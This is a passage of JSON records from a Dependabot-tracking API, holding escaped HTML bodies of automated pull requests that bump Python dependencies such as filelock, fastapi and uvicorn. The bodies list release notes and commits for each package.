stdlib.\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/d562ad5aabe23dc03b22fccdf84dc01fddf0d336\"\u003e\u003ccode\u003ed562ad5\u003c/code\u003e\u003c/a\u003e Changes for 0.4.1.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/6286442857de9f734686d08f0e59ca8048ee357a\"\u003e\u003ccode\u003e6286442\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/distlib/issues/251\"\u003e#251\u003c/a\u003e: Use more appropriate function in test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/e3b1cd6ec121058ae71a2aab08aa2a120360c872\"\u003e\u003ccode\u003ee3b1cd6\u003c/code\u003e\u003c/a\u003e Bump version.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/distlib/commit/da3e90aef9c2ea545ac653039dd970174b48ebd4\"\u003e\u003ccode\u003eda3e90a\u003c/code\u003e\u003c/a\u003e Added tag 0.4.0 for changeset d31f0b340fde\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pypa/distlib/compare/0.4.0...0.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `filelock` from 3.25.2 to 3.29.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/tox-dev/py-filelock/releases\"\u003efilelock's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.29.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocs: fix API docs of \u003ccode\u003erelease()\u003c/code\u003e by \u003ca href=\"https://github.com/MrAnno\"\u003e\u003ccode\u003e@​MrAnno\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/540\"\u003etox-dev/filelock#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: clarify per-thread scope of FileLock configuration by \u003ca href=\"https://github.com/Gares95\"\u003e\u003ccode\u003e@​Gares95\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/543\"\u003etox-dev/filelock#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/542\"\u003etox-dev/filelock#542\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/544\"\u003etox-dev/filelock#544\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: improve filelock maintenance path by \u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/545\"\u003etox-dev/filelock#545\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🐛 fix(soft): refuse to follow symlinks when reading the lock file by \u003ca href=\"https://github.com/dxbjavid\"\u003e\u003ccode\u003e@​dxbjavid\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/548\"\u003etox-dev/filelock#548\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrAnno\"\u003e\u003ccode\u003e@​MrAnno\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/540\"\u003etox-dev/filelock#540\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Gares95\"\u003e\u003ccode\u003e@​Gares95\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/543\"\u003etox-dev/filelock#543\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lphuc2250gma\"\u003e\u003ccode\u003e@​lphuc2250gma\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/542\"\u003etox-dev/filelock#542\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dxbjavid\"\u003e\u003ccode\u003e@​dxbjavid\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/548\"\u003etox-dev/filelock#548\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.29.0...3.29.1\"\u003ehttps://github.com/tox-dev/filelock/compare/3.29.0...3.29.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.29.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e🐛 fix(async): use single-thread executor for lock consistency by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/533\"\u003etox-dev/filelock#533\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ feat(soft): enable stale lock detection on Windows by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/534\"\u003etox-dev/filelock#534\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.28.0...3.29.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.28.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e🐛 fix(ci): unbreak release workflow, publish to PyPI again by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/529\"\u003etox-dev/filelock#529\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.27.0...3.28.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.27.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ feat(rw): add SoftReadWriteLock for NFS and HPC clusters by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/tox-dev/filelock/pull/528\"\u003etox-dev/filelock#528\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/tox-dev/filelock/compare/3.26.1...3.27.0\"\u003ehttps://github.com/tox-dev/filelock/compare/3.26.1...3.27.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e3.26.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blo...\n\n_Description has been truncated_","html_url":"https://github.com/IvanAnishchuk/geek42/pull/163","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/IvanAnishchuk%2Fgeek42/issues/163","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/163/packages"},{"uuid":"4609372366","node_id":"PR_kwDOShYNp87juM3u","number":12,"state":"open","title":"chore(deps): bump the python-minor-patch group across 1 directory with 12 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-08T01:19:08.000Z","updated_at":"2026-06-08T01:19:09.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":12,"packages":[{"name":"fastapi","old_version":"0.115.14","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.32.1","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"python-multipart","old_version":"0.0.20","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"sqlalchemy","old_version":"2.0.49","new_version":"2.0.50","repository_url":"https://github.com/sqlalchemy/sqlalchemy"},{"name":"asyncpg","old_version":"0.30.0","new_version":"0.31.0","repository_url":"https://github.com/MagicStack/asyncpg"},{"name":"greenlet","old_version":"3.5.0","new_version":"3.5.1","repository_url":"https://github.com/python-greenlet/greenlet"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"scikit-learn","old_version":"1.8.0","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"numpy","old_version":"2.4.5","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"prometheus-client","old_version":"0.21.1","new_version":"0.25.0","repository_url":"https://github.com/prometheus/client_python"},{"name":"typer","old_version":"0.15.3","new_version":"0.26.7","repository_url":"https://github.com/fastapi/typer"},{"name":"ruff","old_version":"0.8.6","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"}],"path":null,"ecosystem":"pip"},"body":"Bumps the python-minor-patch group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [fastapi](https://github.com/fastapi/fastapi) | `0.115.14` | `0.136.3` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.32.1` | `0.49.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.20` | `0.0.32` |\n| [sqlalchemy](https://github.com/sqlalchemy/sqlalchemy) | `2.0.49` | `2.0.50` |\n| [asyncpg](https://github.com/MagicStack/asyncpg) | `0.30.0` | `0.31.0` |\n| [greenlet](https://github.com/python-greenlet/greenlet) | `3.5.0` | `3.5.1` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [scikit-learn](https://github.com/scikit-learn/scikit-learn) | `1.8.0` | `1.9.0` |\n| [numpy](https://github.com/numpy/numpy) | `2.4.5` | `2.4.6` |\n| [prometheus-client](https://github.com/prometheus/client_python) | `0.21.1` | `0.25.0` |\n| [typer](https://github.com/fastapi/typer) | `0.15.3` | `0.26.7` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.8.6` | `0.15.16` |\n\n\nUpdates `fastapi` from 0.115.14 to 0.136.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapi/fastapi/releases\"\u003efastapi's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.136.3\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (the default). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15589\"\u003e#15589\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.136.2\u003c/h2\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Validate Server Sent Event fields to avoid applications from sending broken data. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15588\"\u003e#15588\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15464\"\u003e#15464\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update and simplify docs about help and management. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15583\"\u003e#15583\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.115.14...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.32.1 to 0.49.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.49.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump httptools minimum version to 0.8.0 by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2962\"\u003eKludex/uvicorn#2962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in ProxyHeadersMiddleware (reverses the 0.48.0 behavior of ignoring them) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2971\"\u003eKludex/uvicorn#2971\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca 